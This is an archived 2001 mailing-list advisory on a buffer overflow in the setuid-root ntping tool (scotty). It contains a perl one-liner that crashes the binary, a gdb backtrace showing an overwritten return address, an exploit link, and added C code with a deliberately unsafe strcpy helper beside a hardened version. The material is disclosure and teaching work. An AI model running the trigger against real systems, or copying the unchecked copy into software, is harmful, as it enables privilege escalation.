suid scotty (ntping) overflow (fwd)

From: Larry W. Cashdollar (lwcat_private)
Date: Thu Jun 21 2001 - 07:55:48 PDT


    This has circulated on vuln-dev; not sure if it made it here yet.  Vendor
    has been notified and has released a fixed version, 2.1.11.
    
    My exploit:
    http://vapid.dhs.org/ntping_exp.c
    
    There is a much better exploit out there, but I am not sure if I have
    permission to distribute it.  So I will leave that to the author.
    
    
    Credit: KF <dotslashat_private>
    
    
    ---------- Forwarded message ----------
    Date: Tue, 12 Jun 2001 05:34:16 -0400
    From: KF <dotslashat_private>
    To: vuln-devat_private
    Subject: suid scotty (ntping) overflow
    
    I am not sure that this made it on to the list the first time I sent
    it... so sorry if this is a duplicate.
    
    [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
    Segmentation fault (core dumped)
    
    Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/
    
    What led me to research this:
    arndtat_private-tuebingen.de (Michael Arndt) wrote:
    >   i run scotty-testsuite: what must i change on my system:(Linux
    >   slackware):
    >   ==== Test generated error:
    >   can not connect straps socket: Permission denied
    straps and ntping must be installed suid root.
    
    ^------- Hrmm I sure thought that was interesting to know *grin*
    
    Vendors affected:
    unknown by the author of this document
    
    just a note I found however...
    
    <19990702221232.79B119410at_private>
    Hi folks,
    here is the long promised posting of all suid/sgid files on an alpha of
    SuSE Linux 6.2 ... comments on wrong permissions are welcome.
    Please note that SuSE has got 5 full CD-Roms so that's the reason for the
    many many files ... (and too much suid/sgid ones ...)
    ...
    -rwsr-xr-x   1 root     root        33370 Jun 30 11:11 ./usr/bin/ntping
    -rwsr-xr-x   1 root     root        18352 Jun 30 11:11 ./usr/bin/straps
    ...
    
    [root@linux d0tslash]# gdb /usr/bin/ntping core
    GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
    This GDB was configured as "i386-mandrake-linux"...
    (no debugging symbols found)...
    Core was generated by
    `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    
    Program terminated with signal 11, Segmentation fault.
    Reading symbols from /lib/libnsl.so.1...(no debugging symbols
    found)...done.
    Loaded symbols for /lib/libnsl.so.1
    Reading symbols from /lib/libresolv.so.2...(no debugging symbols
    found)...done.
    Loaded symbols for /lib/libresolv.so.2
    Reading symbols from /lib/libc.so.6...(no debugging symbols
    found)...done.
    Loaded symbols for /lib/libc.so.6
    Reading symbols from /lib/ld-linux.so.2...done.
    Loaded symbols for /lib/ld-linux.so.2
    Reading symbols from /lib/libnss_files.so.2...done.
    Loaded symbols for /lib/libnss_files.so.2
    #0  0x40079b66 in getenv () from /lib/libc.so.6
    (gdb) bt
    #0  0x40079b66 in getenv () from /lib/libc.so.6
    #1  0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
    #2  0x4013b9de in __res_ninit () from /lib/libc.so.6
    #3  0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
    #4  0x4013ff5f in gethostbyname () from /lib/libc.so.6
    #5  0x080495b8 in _start ()
    #6  0x41414141 in ?? ()
    Cannot access memory at address 0x41414141
    
    -KF
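
The crash above is the classic shape of an argument overflow in a setuid binary: a command-line string longer than the buffer it is copied into runs over saved frame data, and the backtrace ends in a return address made of the attacker's own bytes (0x41414141). ntping's actual source is not on this page, so the following is an added illustration of that bug class, not the project's code: a hypothetical helper that takes a host name from argv, shown once with the unbounded copy and once with a length check in front of it. The buffer size, the function names and the 255-byte limit (the maximum length of a DNS name under RFC 1035) are assumptions of the example.

```c
/* Added illustration (not ntping's source): a setuid tool copies a host name
 * from argv into a fixed stack buffer. The unsafe variant is the bug class the
 * gdb session above points at; the safe variant refuses over-long input. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Longest DNS name the resolver will accept (RFC 1035: 255 octets). */
#define MAX_HOST_LEN 255

/* Unsafe: strcpy() trusts the caller's length. An argument longer than
 * sizeof(host) overwrites saved registers and the return address, which is
 * how a frame like "#6 0x41414141 in ?? ()" ends up in a backtrace.
 * Never call this with untrusted input; it is here only for comparison. */
void parse_host_unsafe(const char *arg)
{
    char host[MAX_HOST_LEN + 1];
    strcpy(host, arg);              /* no length check: overflow on long input */
    printf("resolving %s\n", host);
}

/* Safe: measure the argument without scanning past the legal limit, reject it
 * if it is empty or too long for either the protocol or the buffer, then copy
 * with an explicit bound. Returns 0 on success, -1 if the argument was refused. */
int parse_host_safe(const char *arg, char *host, size_t hostsz)
{
    size_t n;

    if (arg == NULL || hostsz == 0)
        return -1;
    /* Stop counting at MAX_HOST_LEN + 1 so a 9000-byte argument costs nothing. */
    for (n = 0; n <= MAX_HOST_LEN && arg[n] != '\0'; n++)
        ;
    if (n == 0 || n > MAX_HOST_LEN || n >= hostsz)
        return -1;                  /* empty, longer than a DNS name, or no room */
    memcpy(host, arg, n);
    host[n] = '\0';
    return 0;
}

/* 1 if the hardened path would accept this argument, 0 otherwise. */
int host_arg_ok(const char *arg)
{
    char host[MAX_HOST_LEN + 1];
    return parse_host_safe(arg, host, sizeof host) == 0;
}

/* Convenience for exercising the length boundary: a host name made of `len`
 * copies of `c`, e.g. the 9000 'A's from the original crash. */
int repeated_host_ok(char c, size_t len)
{
    char *buf = malloc(len + 1);
    int ok;

    if (buf == NULL)
        return 0;
    memset(buf, c, len);
    buf[len] = '\0';
    ok = host_arg_ok(buf);
    free(buf);
    return ok;
}

int main(int argc, char **argv)
{
    char host[MAX_HOST_LEN + 1];

    if (argc != 2) {
        fprintf(stderr, "usage: %s host\n", argv[0]);
        return 2;
    }
    if (parse_host_safe(argv[1], host, sizeof host) != 0) {
        fprintf(stderr, "host name rejected (empty or longer than %d bytes)\n",
                MAX_HOST_LEN);
        return 1;
    }
    printf("resolving %s\n", host);
    return 0;
}
```

Run against the same input as the original report (`./a.out $(perl -e 'print "A" x 9000')`) the hardened version exits with an error instead of a core dump. The length scan is deliberately capped rather than using strlen(), so the check itself cannot be made to walk an arbitrarily long argument.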
    
    
    


